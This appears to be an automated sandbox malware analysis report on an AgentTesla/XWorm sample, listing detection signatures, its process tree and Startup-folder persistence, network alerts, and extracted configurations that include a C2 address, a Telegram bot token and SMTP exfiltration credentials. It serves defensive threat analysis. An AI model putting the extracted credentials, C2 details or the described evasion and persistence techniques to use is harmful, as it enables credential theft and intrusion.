Edit tour

Windows Analysis Report
Ref#2056119.exe

Overview

General Information

Sample name:	Ref#2056119.exe
Analysis ID:	1562370
MD5:	2c4db8b396dff48ba1e6ae44bd9aae08
SHA1:	79319657ecfb6f4f7b13ab1e99df278a53b7d101
SHA256:	be5ca82d327d53fc7eb8719289394cf37cc1f45d39429b8e527d600193b706e0
Tags:	AgentTeslaexeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Ref#2056119.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\Ref#2056119.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)

Liphmahu.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\Liphmahu.exe" MD5: 225F257617CD3A58DB6D4CCC447F48E9)

Liphmahu.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\Temp\Liphmahu.exe" MD5: 225F257617CD3A58DB6D4CCC447F48E9)

WerFault.exe (PID: 4136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)

Ref#2056119.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\Ref#2056119.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)

wscript.exe (PID: 8168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

ishon.exe (PID: 7236 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)

ishon.exe (PID: 4588 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9fe46:$s8: Win32_ComputerSystem 0x118d7a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x118e17:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x118f2c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x117de8:$cnc4: POST / HTTP/1.1
00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.3116067900.0000000002F94000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x109da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10a77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10b8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfa48:$cnc4: POST / HTTP/1.1
0000000C.00000002.3116067900.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3115674716.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2215628448.0000000006890000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2055273808.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.3116067900.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.3115674716.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Ref#2056119.exe PID: 7496	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Ref#2056119.exe PID: 7496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ref#2056119.exe PID: 7496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ref#2056119.exe PID: 7496	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Liphmahu.exe PID: 7852	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Liphmahu.exe PID: 7852	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Liphmahu.exe PID: 7852	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Liphmahu.exe PID: 7852	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Ref#2056119.exe PID: 7912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ref#2056119.exe PID: 7912	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ishon.exe PID: 7236	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: ishon.exe PID: 7236	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ishon.exe PID: 7236	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ishon.exe PID: 7236	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Liphmahu.exe PID: 6104	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: ishon.exe PID: 4588	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ishon.exe PID: 4588	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 41 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Liphmahu.exe.6890000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.Liphmahu.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
8.2.Liphmahu.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.Liphmahu.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfc48:$cnc4: POST / HTTP/1.1
4.2.Liphmahu.exe.25f81a0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.Liphmahu.exe.25f81a0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.Liphmahu.exe.25f81a0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfc48:$cnc4: POST / HTTP/1.1
4.2.Liphmahu.exe.25f81a0.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.Liphmahu.exe.25f81a0.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xedda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xee77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xef8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xde48:$cnc4: POST / HTTP/1.1
5.2.Ref#2056119.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.Ref#2056119.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.Ref#2056119.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.Liphmahu.exe.3630ad0.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Ref#2056119.exe.3f8cd58.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ref#2056119.exe.3f8cd58.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Ref#2056119.exe.3f8cd58.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.ishon.exe.43fe2e0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.ishon.exe.43fe2e0.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.ishon.exe.43fe2e0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Ref#2056119.exe.71f0000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.ishon.exe.43fe2e0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.ishon.exe.43fe2e0.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.ishon.exe.43fe2e0.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6dc9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dd0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6dd97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6de29:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6de93:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6df05:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6df9b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e02b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , ProcessId: 8168, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Ref#2056119.exe, Initiated: true, ProcessId: 7912, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49743

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , ProcessId: 8168, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#2056119.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Suricata Signatures

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T14:47:21.747037+0100	2030171	1	A Network Trojan was detected	192.168.2.4	49757	162.254.34.31	587	TCP
2024-11-25T14:49:22.543441+0100	2030171	1	A Network Trojan was detected	192.168.2.4	49743	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T14:47:46.266953+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49743	162.254.34.31	587	TCP
2024-11-25T14:48:13.004462+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49757	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T14:47:46.266953+0100	2855245	1	A Network Trojan was detected	192.168.2.4	49743	162.254.34.31	587	TCP
2024-11-25T14:48:13.004462+0100	2855245	1	A Network Trojan was detected	192.168.2.4	49757	162.254.34.31	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T14:47:21.747037+0100	2840032	1	A Network Trojan was detected	192.168.2.4	49757	162.254.34.31	587	TCP
2024-11-25T14:49:22.543441+0100	2840032	1	A Network Trojan was detected	192.168.2.4	49743	162.254.34.31	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000002.3113434795.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759"}
Source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ishon.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: Ref#2056119.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ishon.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Ref#2056119.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 8.2.Liphmahu.exe.400000.0.unpack	String decryptor: 89.40.31.232
Source: 8.2.Liphmahu.exe.400000.0.unpack	String decryptor: 1717
Source: 8.2.Liphmahu.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 8.2.Liphmahu.exe.400000.0.unpack	String decryptor: 28Nov2024
Source: 8.2.Liphmahu.exe.400000.0.unpack	String decryptor: USB.exe

Source: Ref#2056119.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: Ref#2056119.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdbsR source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
